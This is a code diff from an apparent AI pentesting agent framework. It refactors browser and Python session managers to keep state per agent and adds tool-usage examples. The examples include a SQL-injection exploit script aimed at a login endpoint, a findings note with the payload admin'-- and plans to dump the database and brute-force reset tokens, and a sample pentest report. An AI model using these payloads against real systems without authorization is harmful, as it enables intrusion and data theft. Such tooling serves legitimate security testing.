@@ -97,12 +110,12 @@ class BrowserTabManager:
return result
def forward(self, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.forward(tab_id)
result = browser.forward(tab_id)
result["message"] = "Navigated forward"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to go forward: {e}") from e
@@ -110,12 +123,12 @@ class BrowserTabManager:
return result
def new_tab(self, url: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.new_tab(url)
result = browser.new_tab(url)
result["message"] = f"Created new tab {result.get('tab_id', '')}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to create new tab: {e}") from e
@@ -123,12 +136,12 @@ class BrowserTabManager:
return result
def switch_tab(self, tab_id: str) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.switch_tab(tab_id)
result = browser.switch_tab(tab_id)
result["message"] = f"Switched to tab {tab_id}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to switch tab: {e}") from e
@@ -136,12 +149,12 @@ class BrowserTabManager:
return result
def close_tab(self, tab_id: str) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.close_tab(tab_id)
result = browser.close_tab(tab_id)
result["message"] = f"Closed tab {tab_id}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to close tab: {e}") from e
@@ -149,12 +162,12 @@ class BrowserTabManager:
return result
def wait_browser(self, duration: float, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.wait(duration, tab_id)
result = browser.wait(duration, tab_id)
result["message"] = f"Waited {duration}s"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to wait: {e}") from e
@@ -162,12 +175,12 @@ class BrowserTabManager:
return result
def execute_js(self, js_code: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.execute_js(js_code, tab_id)
result = browser.execute_js(js_code, tab_id)
result["message"] = "JavaScript executed successfully"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to execute JavaScript: {e}") from e
@@ -175,12 +188,12 @@ class BrowserTabManager:
return result
def double_click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.double_click(coordinate, tab_id)
result = browser.double_click(coordinate, tab_id)
result["message"] = f"Double clicked at {coordinate}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to double click: {e}") from e
@@ -188,12 +201,12 @@ class BrowserTabManager:
return result
def hover(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.hover(coordinate, tab_id)
result = browser.hover(coordinate, tab_id)
result["message"] = f"Hovered at {coordinate}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to hover: {e}") from e
@@ -201,12 +214,12 @@ class BrowserTabManager:
return result
def press_key(self, key: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.press_key(key, tab_id)
result = browser.press_key(key, tab_id)
result["message"] = f"Pressed key {key}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to press key: {e}") from e
@@ -214,12 +227,12 @@ class BrowserTabManager:
return result
def save_pdf(self, file_path: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.save_pdf(file_path, tab_id)
result = browser.save_pdf(file_path, tab_id)
result["message"] = f"Page saved as PDF: {file_path}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to save PDF: {e}") from e
@@ -227,12 +240,12 @@ class BrowserTabManager:
return result
def get_console_logs(self, tab_id: str | None = None, clear: bool = False) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.get_console_logs(tab_id, clear)
result = browser.get_console_logs(tab_id, clear)
action_text = "cleared and retrieved" if clear else "retrieved"
logs = result.get("console_logs", [])
@@ -249,12 +262,12 @@ class BrowserTabManager:
return result
def view_source(self, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.view_source(tab_id)
result = browser.view_source(tab_id)
result["message"] = "Page source retrieved"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to get page source: {e}") from e
@@ -262,18 +275,18 @@ class BrowserTabManager:
return result
def list_tabs(self) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
return {"tabs": {}, "total_count": 0, "current_tab": None}
browser = self._get_agent_browser()
if browser is None:
return {"tabs": {}, "total_count": 0, "current_tab": None}
try:
tab_info = {}
for tid, tab_page in self.browser_instance.pages.items():
for tid, tab_page in browser.pages.items():
try:
tab_info[tid] = {
"url": tab_page.url,
"title": "Unknown" if tab_page.is_closed() else "Active",
"is_current": tid == self.browser_instance.current_page_id,
"is_current": tid == browser.current_page_id,
}
except (AttributeError, RuntimeError):
tab_info[tid] = {
@@ -285,19 +298,20 @@ class BrowserTabManager:
return {
"tabs": tab_info,
"total_count": len(tab_info),
"current_tab": self.browser_instance.current_page_id,
"current_tab": browser.current_page_id,
}
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to list tabs: {e}") from e
def close_browser(self) -> dict[str, Any]:
agent_id = get_current_agent_id()
with self._lock:
if self.browser_instance is None:
browser = self._browsers_by_agent.pop(agent_id, None)
if browser is None:
raise ValueError("Browser not launched")
try:
self.browser_instance.close()
self.browser_instance = None
browser.close()
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to close browser: {e}") from e
else:
@@ -307,33 +321,38 @@ class BrowserTabManager:
"is_running": False,
}
def cleanup_agent(self, agent_id: str) -> None:
with self._lock:
browser = self._browsers_by_agent.pop(agent_id, None)
if browser:
with contextlib.suppress(Exception):
browser.close()
def cleanup_dead_browser(self) -> None:
with self._lock:
if self.browser_instance and not self.browser_instance.is_alive():
dead_agents = []
for agent_id, browser in self._browsers_by_agent.items():
if not browser.is_alive():
dead_agents.append(agent_id)
for agent_id in dead_agents:
browser = self._browsers_by_agent.pop(agent_id)
with contextlib.suppress(Exception):
self.browser_instance.close()
self.browser_instance = None
browser.close()
def close_all(self) -> None:
with self._lock:
if self.browser_instance:
with contextlib.suppress(Exception):
self.browser_instance.close()
self.browser_instance = None
browsers = list(self._browsers_by_agent.values())
self._browsers_by_agent.clear()
for browser in browsers:
with contextlib.suppress(Exception):
browser.close()
def _register_cleanup_handlers(self) -> None:
atexit.register(self.close_all)
signal.signal(signal.SIGTERM, self._signal_handler)
signal.signal(signal.SIGINT, self._signal_handler)
if hasattr(signal, "SIGHUP"):
signal.signal(signal.SIGHUP, self._signal_handler)
def _signal_handler(self, _signum: int, _frame: Any) -> None:
self.close_all()
sys.exit(0)
_browser_tab_manager = BrowserTabManager()

12
strix/tools/context.py Normal file
View File

@@ -0,0 +1,12 @@
from contextvars import ContextVar
current_agent_id: ContextVar[str] = ContextVar("current_agent_id", default="default")
def get_current_agent_id() -> str:
return current_agent_id.get()
def set_current_agent_id(agent_id: str) -> None:
current_agent_id.set(agent_id)

View File

@@ -5,6 +5,7 @@ from typing import Any
import httpx
from strix.config import Config
from strix.telemetry import posthog
if os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "false":
@@ -14,12 +15,14 @@ from .argument_parser import convert_arguments
from .registry import (
get_tool_by_name,
get_tool_names,
get_tool_param_schema,
needs_agent_state,
should_execute_in_sandbox,
)
SANDBOX_EXECUTION_TIMEOUT = float(Config.get("strix_sandbox_execution_timeout") or "500")
_SERVER_TIMEOUT = float(Config.get("strix_sandbox_execution_timeout") or "120")
SANDBOX_EXECUTION_TIMEOUT = _SERVER_TIMEOUT + 30
SANDBOX_CONNECT_TIMEOUT = float(Config.get("strix_sandbox_connect_timeout") or "10")
@@ -81,14 +84,18 @@ async def _execute_tool_in_sandbox(tool_name: str, agent_state: Any, **kwargs: A
response.raise_for_status()
response_data = response.json()
if response_data.get("error"):
posthog.error("tool_execution_error", f"{tool_name}: {response_data['error']}")
raise RuntimeError(f"Sandbox execution error: {response_data['error']}")
return response_data.get("result")
except httpx.HTTPStatusError as e:
posthog.error("tool_http_error", f"{tool_name}: HTTP {e.response.status_code}")
if e.response.status_code == 401:
raise RuntimeError("Authentication failed: Invalid or missing sandbox token") from e
raise RuntimeError(f"HTTP error calling tool server: {e.response.status_code}") from e
except httpx.RequestError as e:
raise RuntimeError(f"Request error calling tool server: {e}") from e
error_type = type(e).__name__
posthog.error("tool_request_error", f"{tool_name}: {error_type}")
raise RuntimeError(f"Request error calling tool server: {error_type}") from e
async def _execute_tool_locally(tool_name: str, agent_state: Any | None, **kwargs: Any) -> Any:
@@ -110,14 +117,51 @@ async def _execute_tool_locally(tool_name: str, agent_state: Any | None, **kwarg
def validate_tool_availability(tool_name: str | None) -> tuple[bool, str]:
if tool_name is None:
return False, "Tool name is missing"
available = ", ".join(sorted(get_tool_names()))
return False, f"Tool name is missing. Available tools: {available}"
if tool_name not in get_tool_names():
return False, f"Tool '{tool_name}' is not available"
available = ", ".join(sorted(get_tool_names()))
return False, f"Tool '{tool_name}' is not available. Available tools: {available}"
return True, ""
def _validate_tool_arguments(tool_name: str, kwargs: dict[str, Any]) -> str | None:
param_schema = get_tool_param_schema(tool_name)
if not param_schema or not param_schema.get("has_params"):
return None
allowed_params: set[str] = param_schema.get("params", set())
required_params: set[str] = param_schema.get("required", set())
optional_params = allowed_params - required_params
schema_hint = _format_schema_hint(tool_name, required_params, optional_params)
unknown_params = set(kwargs.keys()) - allowed_params
if unknown_params:
unknown_list = ", ".join(sorted(unknown_params))
return f"Tool '{tool_name}' received unknown parameter(s): {unknown_list}\n{schema_hint}"
missing_required = [
param for param in required_params if param not in kwargs or kwargs.get(param) in (None, "")
]
if missing_required:
missing_list = ", ".join(sorted(missing_required))
return f"Tool '{tool_name}' missing required parameter(s): {missing_list}\n{schema_hint}"
return None
def _format_schema_hint(tool_name: str, required: set[str], optional: set[str]) -> str:
parts = [f"Valid parameters for '{tool_name}':"]
if required:
parts.append(f" Required: {', '.join(sorted(required))}")
if optional:
parts.append(f" Optional: {', '.join(sorted(optional))}")
return "\n".join(parts)
async def execute_tool_with_validation(
tool_name: str | None, agent_state: Any | None = None, **kwargs: Any
) -> Any:
@@ -127,6 +171,10 @@ async def execute_tool_with_validation(
assert tool_name is not None
arg_error = _validate_tool_arguments(tool_name, kwargs)
if arg_error:
return f"Error: {arg_error}"
try:
result = await execute_tool(tool_name, agent_state, **kwargs)
except Exception as e: # noqa: BLE001

View File

@@ -104,8 +104,30 @@
# Create a file
<function=str_replace_editor>
<parameter=command>create</parameter>
<parameter=path>/home/user/project/new_file.py</parameter>
<parameter=file_text>print("Hello World")</parameter>
<parameter=path>/home/user/project/exploit.py</parameter>
<parameter=file_text>#!/usr/bin/env python3
"""SQL Injection exploit for Acme Corp login endpoint."""
import requests
import sys
TARGET = "https://app.acme-corp.com/api/v1/auth/login"
def exploit(username: str) -> dict:
payload = {
"username": f"{username}'--",
"password": "anything"
}
response = requests.post(TARGET, json=payload, timeout=10)
return response.json()
if __name__ == "__main__":
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <username>")
sys.exit(1)
result = exploit(sys.argv[1])
print(f"Result: {result}")</parameter>
</function>
# Replace text in file
@@ -121,7 +143,27 @@
<parameter=command>insert</parameter>
<parameter=path>/home/user/project/file.py</parameter>
<parameter=insert_line>10</parameter>
<parameter=new_str>print("Inserted line")</parameter>
<parameter=new_str>def validate_input(user_input: str) -> bool:
"""Validate user input to prevent injection attacks."""
forbidden_chars = ["'", '"', ";", "--", "/*", "*/"]
for char in forbidden_chars:
if char in user_input:
return False
return True</parameter>
</function>
# Replace code block
<function=str_replace_editor>
<parameter=command>str_replace</parameter>
<parameter=path>/home/user/project/auth.py</parameter>
<parameter=old_str>def authenticate(username, password):
query = f"SELECT * FROM users WHERE username = '{username}'"
result = db.execute(query)
return result</parameter>
<parameter=new_str>def authenticate(username, password):
query = "SELECT * FROM users WHERE username = %s"
result = db.execute(query, (username,))
return result</parameter>
</function>
</examples>
</tool>

View File

@@ -66,5 +66,87 @@ Professional, customer-facing penetration test report rules (PDF-ready):
<returns type="Dict[str, Any]">
<description>Response containing success status, vulnerability count, and completion message. If agents are still running, returns details about active agents and suggested actions.</description>
</returns>
<examples>
<function=finish_scan>
<parameter=executive_summary>Executive summary
An external penetration test of the Acme Customer Portal and associated API identified multiple security weaknesses that, if exploited, could result in unauthorized access to customer data, cross-tenant exposure, and access to internal network resources.
Overall risk posture: Elevated.
Key outcomes
- Confirmed server-side request forgery (SSRF) in a URL preview capability that enables the application to initiate outbound requests to attacker-controlled destinations and internal network ranges.
- Identified broken access control patterns in business-critical workflows that can enable cross-tenant data access (tenant isolation failures).
- Observed session and authorization hardening gaps that materially increase risk when combined with other weaknesses.
Business impact
- Increased likelihood of sensitive data exposure across customers/tenants, including invoices, orders, and account information.
- Increased risk of internal service exposure through server-side outbound request functionality (including link-local and private network destinations).
- Increased potential for account compromise and administrative abuse if tokens are stolen or misused.
Remediation theme
Prioritize eliminating SSRF pathways and centralizing authorization enforcement (deny-by-default). Follow with session hardening and monitoring improvements, then validate with a focused retest.</parameter>
<parameter=methodology>Methodology
The assessment followed industry-standard penetration testing practices aligned to OWASP Web Security Testing Guide (WSTG) concepts and common web/API security testing methodology.
Engagement details
- Assessment type: External penetration test (black-box with limited gray-box context)
- Target environment: Production-equivalent staging
Scope (in-scope assets)
- Web application: https://app.acme-corp.com
- API base: https://app.acme-corp.com/api/v1/
High-level testing activities
- Reconnaissance and attack-surface mapping (routes, parameters, workflows)
- Authentication and session management review (token handling, session lifetime, sensitive actions)
- Authorization and tenant-isolation testing (object access and privilege boundaries)
- Input handling and server-side request testing (URL fetchers, imports, previews, callbacks)
- File handling and content rendering review (uploads, previews, unsafe content types)
- Configuration review (transport security, security headers, caching behavior, error handling)
Evidence handling and validation standard
Only validated issues with reproducible impact were treated as findings. Each finding was documented with clear reproduction steps and sufficient evidence to support remediation and verification testing.</parameter>
<parameter=technical_analysis>Technical analysis
This section provides a consolidated view of the confirmed findings and observed risk patterns. Detailed reproduction steps and evidence are documented in the individual vulnerability reports.
Severity model
Severity reflects a combination of exploitability and potential impact to confidentiality, integrity, and availability, considering realistic attacker capabilities.
Confirmed findings (high level)
1) Server-side request forgery (SSRF) in URL preview (Critical)
The application fetches user-supplied URLs server-side to generate previews. Validation controls were insufficient to prevent access to internal and link-local destinations. This creates a pathway to internal network enumeration and potential access to sensitive internal services. Redirect and DNS/normalization bypass risk must be assumed unless controls are comprehensive and applied on every request hop.
2) Broken tenant isolation in order/invoice workflows (High)
Multiple endpoints accepted object identifiers without consistently enforcing tenant ownership. This is indicative of broken function- and object-level authorization checks. In practice, this can enable cross-tenant access to business-critical resources (viewing or modifying data outside the attackers tenant boundary).
3) Administrative action hardening gaps (Medium)
Several sensitive actions lacked defense-in-depth controls (e.g., re-authentication for high-risk actions, consistent authorization checks across related endpoints, and protections against session misuse). While not all behaviors were immediately exploitable in isolation, they increase the likelihood and blast radius of account compromise when chained with other vulnerabilities.
4) Unsafe file preview/content handling patterns (Medium)
File preview and rendering behaviors can create exposure to script execution or content-type confusion if unsafe formats are rendered inline. Controls should be consistent: strong content-type validation, forced download where appropriate, and hardening against active content.
Systemic themes and root causes
- Authorization enforcement appears distributed and inconsistent across endpoints instead of centralized and testable.
- Outbound request functionality lacks a robust, deny-by-default policy for destination validation.
- Hardening controls (session lifetime, sensitive-action controls, logging) are applied unevenly, increasing the likelihood of successful attack chains.</parameter>
<parameter=recommendations>Recommendations
Priority 0
- Eliminate SSRF by implementing a strict destination allowlist and deny-by-default policy for outbound requests. Block private, loopback, and link-local ranges (IPv4 and IPv6) after DNS resolution. Re-validate on every redirect hop. Apply URL parsing/normalization safeguards against ambiguous encodings and unusual IP notations.
- Apply network egress controls so the application runtime cannot reach sensitive internal ranges or link-local services. Route necessary outbound requests through a policy-enforcing egress proxy with logging.
Priority 1
- Centralize authorization enforcement for all object access and administrative actions. Implement consistent tenant-ownership checks for every read/write path involving orders, invoices, and account resources. Adopt deny-by-default authorization middleware/policies.
- Add regression tests for authorization decisions, including cross-tenant negative cases and privilege-boundary testing for administrative endpoints.
- Harden session management: secure cookie attributes, session rotation after authentication and privilege change events, reduced session lifetime for privileged contexts, and consistent CSRF protections for state-changing actions.
Priority 2
- Harden file handling and preview behaviors: strict content-type allowlists, forced download for active formats, safe rendering pipelines, and scanning/sanitization where applicable.
- Improve monitoring and detection: alert on high-risk events such as repeated authorization failures, anomalous outbound fetch attempts, sensitive administrative actions, and unusual access patterns to business-critical resources.
Follow-up validation
- Conduct a targeted retest after remediation to confirm SSRF controls, tenant isolation enforcement, and session hardening, and to ensure no bypasses exist via redirects, DNS rebinding, or encoding edge cases.</parameter>
</function>
</examples>
</tool>
</tools>

View File

@@ -24,29 +24,54 @@
<examples>
# Document an interesting finding
<function=create_note>
<parameter=title>Interesting Directory Found</parameter>
<parameter=content>Found /backup/ directory that might contain sensitive files. Directory listing
seems disabled but worth investigating further.</parameter>
<parameter=title>Authentication Bypass Findings</parameter>
<parameter=content>Discovered multiple authentication bypass vectors in the login system:
1. SQL Injection in username field
- Payload: admin'--
- Result: Full authentication bypass
- Endpoint: POST /api/v1/auth/login
2. JWT Token Weakness
- Algorithm confusion attack possible (RS256 -> HS256)
- Token expiration is 24 hours but no refresh rotation
- Token stored in localStorage (XSS risk)
3. Password Reset Flow
- Reset tokens are only 6 digits (brute-forceable)
- No rate limiting on reset attempts
- Token valid for 48 hours
Next Steps:
- Extract full database via SQL injection
- Test JWT manipulation attacks
- Attempt password reset brute force</parameter>
<parameter=category>findings</parameter>
<parameter=tags>["directory", "backup"]</parameter>
<parameter=tags>["auth", "sqli", "jwt", "critical"]</parameter>
</function>
# Methodology note
<function=create_note>
<parameter=title>Authentication Flow Analysis</parameter>
<parameter=content>The application uses JWT tokens stored in localStorage. Token expiration is
set to 24 hours. Observed that refresh token rotation is not implemented.</parameter>
<parameter=category>methodology</parameter>
<parameter=tags>["auth", "jwt", "session"]</parameter>
</function>
<parameter=title>API Endpoint Mapping Complete</parameter>
<parameter=content>Completed comprehensive API enumeration using multiple techniques:
# Research question
<function=create_note>
<parameter=title>Custom Header Investigation</parameter>
<parameter=content>The API returns a custom X-Request-ID header. Need to research if this
could be used for user tracking or has any security implications.</parameter>
<parameter=category>questions</parameter>
<parameter=tags>["headers", "research"]</parameter>
Discovered Endpoints:
- /api/v1/auth/* - Authentication endpoints (login, register, reset)
- /api/v1/users/* - User management (profile, settings, admin)
- /api/v1/orders/* - Order management (IDOR vulnerability confirmed)
- /api/v1/admin/* - Admin panel (403 but may be bypassable)
- /api/internal/* - Internal APIs (should not be exposed)
Methods Used:
- Analyzed JavaScript bundles for API calls
- Bruteforced common paths with ffuf
- Reviewed OpenAPI/Swagger documentation at /api/docs
- Monitored traffic during normal application usage
Priority Targets:
The /api/internal/* endpoints are high priority as they appear to lack authentication checks based on error message differences.</parameter>
<parameter=category>methodology</parameter>
<parameter=tags>["api", "enumeration", "recon"]</parameter>
</function>
</examples>
</tool>

View File

@@ -1,4 +1,3 @@
<?xml version="1.0" ?>
<tools>
<tool name="list_requests">
<description>List and filter proxy requests using HTTPQL with pagination.</description>

View File

@@ -16,17 +16,24 @@ if TYPE_CHECKING:
from collections.abc import Callable
CAIDO_PORT = 48080 # Fixed port inside container
class ProxyManager:
def __init__(self, auth_token: str | None = None):
host = "127.0.0.1"
port = os.getenv("CAIDO_PORT", "56789")
self.base_url = f"http://{host}:{port}/graphql"
self.proxies = {"http": f"http://{host}:{port}", "https": f"http://{host}:{port}"}
self.base_url = f"http://{host}:{CAIDO_PORT}/graphql"
self.proxies = {
"http": f"http://{host}:{CAIDO_PORT}",
"https": f"http://{host}:{CAIDO_PORT}",
}
self.auth_token = auth_token or os.getenv("CAIDO_API_TOKEN")
self.transport = RequestsHTTPTransport(
def _get_client(self) -> Client:
transport = RequestsHTTPTransport(
url=self.base_url, headers={"Authorization": f"Bearer {self.auth_token}"}
)
self.client = Client(transport=self.transport, fetch_schema_from_transport=False)
return Client(transport=transport, fetch_schema_from_transport=False)
def list_requests(
self,
@@ -85,7 +92,7 @@ class ProxyManager:
}
try:
result = self.client.execute(query, variable_values=variables)
result = self._get_client().execute(query, variable_values=variables)
data = result.get("requestsByOffset", {})
nodes = [edge["node"] for edge in data.get("edges", [])]
@@ -132,7 +139,9 @@ class ProxyManager:
return {"error": f"Invalid part '{part}'. Use 'request' or 'response'"}
try:
result = self.client.execute(gql(queries[part]), variable_values={"id": request_id})
result = self._get_client().execute(
gql(queries[part]), variable_values={"id": request_id}
)
request_data = result.get("request", {})
if not request_data:
@@ -430,7 +439,9 @@ class ProxyManager:
}
def _handle_scope_list(self) -> dict[str, Any]:
result = self.client.execute(gql("query { scopes { id name allowlist denylist indexed } }"))
result = self._get_client().execute(
gql("query { scopes { id name allowlist denylist indexed } }")
)
scopes = result.get("scopes", [])
return {"scopes": scopes, "count": len(scopes)}
@@ -438,7 +449,7 @@ class ProxyManager:
if not scope_id:
return self._handle_scope_list()
result = self.client.execute(
result = self._get_client().execute(
gql(
"query GetScope($id: ID!) { scope(id: $id) { id name allowlist denylist indexed } }"
),
@@ -467,7 +478,7 @@ class ProxyManager:
}
""")
result = self.client.execute(
result = self._get_client().execute(
mutation,
variable_values={
"input": {
@@ -507,7 +518,7 @@ class ProxyManager:
}
""")
result = self.client.execute(
result = self._get_client().execute(
mutation,
variable_values={
"id": scope_id,
@@ -530,7 +541,7 @@ class ProxyManager:
if not scope_id:
return {"error": "scope_id required for delete"}
result = self.client.execute(
result = self._get_client().execute(
gql("mutation DeleteScope($id: ID!) { deleteScope(id: $id) { deletedId } }"),
variable_values={"id": scope_id},
)
@@ -607,7 +618,7 @@ class ProxyManager:
}
}
""")
result = self.client.execute(
result = self._get_client().execute(
query, variable_values={"parentId": parent_id, "depth": depth}
)
data = result.get("sitemapDescendantEntries", {})
@@ -624,7 +635,7 @@ class ProxyManager:
}
}
""")
result = self.client.execute(query, variable_values={"scopeId": scope_id})
result = self._get_client().execute(query, variable_values={"scopeId": scope_id})
data = result.get("sitemapRootEntries", {})
all_nodes = [edge["node"] for edge in data.get("edges", [])]
@@ -731,7 +742,7 @@ class ProxyManager:
}
""")
result = self.client.execute(query, variable_values={"id": entry_id})
result = self._get_client().execute(query, variable_values={"id": entry_id})
entry = result.get("sitemapEntry")
if not entry:
@@ -780,6 +791,7 @@ _PROXY_MANAGER: ProxyManager | None = None
def get_proxy_manager() -> ProxyManager:
global _PROXY_MANAGER # noqa: PLW0603
if _PROXY_MANAGER is None:
return ProxyManager()
_PROXY_MANAGER = ProxyManager()
return _PROXY_MANAGER

View File

@@ -1,4 +1,3 @@
<?xml version="1.0" encoding="UTF-8"?>
<tools>
<tool name="python_action">
<description>Perform Python actions using persistent interpreter sessions for cybersecurity tasks.</description>
@@ -55,6 +54,7 @@
- Print statements and stdout are captured
- Variables persist between executions in the same session
- Imports, function definitions, etc. persist in the session
- IMPORTANT (multiline): Put real line breaks in your code. Do NOT emit literal "\n" sequences — use actual newlines.
- IPython magic commands are fully supported (%pip, %time, %whos, %%writefile, etc.)
- Line magics (%) and cell magics (%%) work as expected
6. CLOSE: Terminates the session completely and frees memory
@@ -73,6 +73,14 @@
print("Security analysis session started")</parameter>
</function>
<function=python_action>
<parameter=action>execute</parameter>
<parameter=code>import requests
url = "https://example.com"
resp = requests.get(url, timeout=10)
print(resp.status_code)</parameter>
</function>
# Analyze security data in the default session
<function=python_action>
<parameter=action>execute</parameter>

View File

@@ -1,5 +1,4 @@
import io
import signal
import sys
import threading
from typing import Any
@@ -57,28 +56,6 @@ class PythonInstance:
}
return None
def _setup_execution_environment(self, timeout: int) -> tuple[Any, io.StringIO, io.StringIO]:
stdout_capture = io.StringIO()
stderr_capture = io.StringIO()
def timeout_handler(signum: int, frame: Any) -> None:
raise TimeoutError(f"Code execution timed out after {timeout} seconds")
old_handler = signal.signal(signal.SIGALRM, timeout_handler)
signal.alarm(timeout)
sys.stdout = stdout_capture
sys.stderr = stderr_capture
return old_handler, stdout_capture, stderr_capture
def _cleanup_execution_environment(
self, old_handler: Any, old_stdout: Any, old_stderr: Any
) -> None:
signal.signal(signal.SIGALRM, old_handler)
sys.stdout = old_stdout
sys.stderr = old_stderr
def _truncate_output(self, content: str, max_length: int, suffix: str) -> str:
if len(content) > max_length:
return content[:max_length] + suffix
@@ -142,27 +119,52 @@ class PythonInstance:
return session_error
with self._execution_lock:
result_container: dict[str, Any] = {}
stdout_capture = io.StringIO()
stderr_capture = io.StringIO()
cancelled = threading.Event()
old_stdout, old_stderr = sys.stdout, sys.stderr
try:
old_handler, stdout_capture, stderr_capture = self._setup_execution_environment(
timeout
def _run_code() -> None:
try:
sys.stdout = stdout_capture
sys.stderr = stderr_capture
execution_result = self.shell.run_cell(code, silent=False, store_history=True)
result_container["execution_result"] = execution_result
result_container["stdout"] = stdout_capture.getvalue()
result_container["stderr"] = stderr_capture.getvalue()
except (KeyboardInterrupt, SystemExit) as e:
result_container["error"] = e
except Exception as e: # noqa: BLE001
result_container["error"] = e
finally:
if not cancelled.is_set():
sys.stdout = old_stdout
sys.stderr = old_stderr
exec_thread = threading.Thread(target=_run_code, daemon=True)
exec_thread.start()
exec_thread.join(timeout=timeout)
if exec_thread.is_alive():
cancelled.set()
sys.stdout, sys.stderr = old_stdout, old_stderr
return self._handle_execution_error(
TimeoutError(f"Code execution timed out after {timeout} seconds")
)
try:
execution_result = self.shell.run_cell(code, silent=False, store_history=True)
signal.alarm(0)
if "error" in result_container:
return self._handle_execution_error(result_container["error"])
return self._format_execution_result(
execution_result, stdout_capture.getvalue(), stderr_capture.getvalue()
)
if "execution_result" in result_container:
return self._format_execution_result(
result_container["execution_result"],
result_container.get("stdout", ""),
result_container.get("stderr", ""),
)
except (TimeoutError, KeyboardInterrupt, SystemExit) as e:
signal.alarm(0)
return self._handle_execution_error(e)
finally:
self._cleanup_execution_environment(old_handler, old_stdout, old_stderr)
return self._handle_execution_error(RuntimeError("Unknown execution error"))
def close(self) -> None:
self.is_running = False

View File

@@ -1,33 +1,41 @@
import atexit
import contextlib
import signal
import sys
import threading
from typing import Any
from strix.tools.context import get_current_agent_id
from .python_instance import PythonInstance
class PythonSessionManager:
def __init__(self) -> None:
self.sessions: dict[str, PythonInstance] = {}
self._sessions_by_agent: dict[str, dict[str, PythonInstance]] = {}
self._lock = threading.Lock()
self.default_session_id = "default"
self._register_cleanup_handlers()
def _get_agent_sessions(self) -> dict[str, PythonInstance]:
agent_id = get_current_agent_id()
with self._lock:
if agent_id not in self._sessions_by_agent:
self._sessions_by_agent[agent_id] = {}
return self._sessions_by_agent[agent_id]
def create_session(
self, session_id: str | None = None, initial_code: str | None = None, timeout: int = 30
) -> dict[str, Any]:
if session_id is None:
session_id = self.default_session_id
sessions = self._get_agent_sessions()
with self._lock:
if session_id in self.sessions:
if session_id in sessions:
raise ValueError(f"Python session '{session_id}' already exists")
session = PythonInstance(session_id)
self.sessions[session_id] = session
sessions[session_id] = session
if initial_code:
result = session.execute_code(initial_code, timeout)
@@ -51,11 +59,12 @@ class PythonSessionManager:
if not code:
raise ValueError("No code provided for execution")
sessions = self._get_agent_sessions()
with self._lock:
if session_id not in self.sessions:
if session_id not in sessions:
raise ValueError(f"Python session '{session_id}' not found")
session = self.sessions[session_id]
session = sessions[session_id]
result = session.execute_code(code, timeout)
result["message"] = f"Code executed in session '{session_id}'"
@@ -65,11 +74,12 @@ class PythonSessionManager:
if session_id is None:
session_id = self.default_session_id
sessions = self._get_agent_sessions()
with self._lock:
if session_id not in self.sessions:
if session_id not in sessions:
raise ValueError(f"Python session '{session_id}' not found")
session = self.sessions.pop(session_id)
session = sessions.pop(session_id)
session.close()
return {
@@ -79,9 +89,10 @@ class PythonSessionManager:
}
def list_sessions(self) -> dict[str, Any]:
sessions = self._get_agent_sessions()
with self._lock:
session_info = {}
for sid, session in self.sessions.items():
for sid, session in sessions.items():
session_info[sid] = {
"is_running": session.is_running,
"is_alive": session.is_alive(),
@@ -89,40 +100,41 @@ class PythonSessionManager:
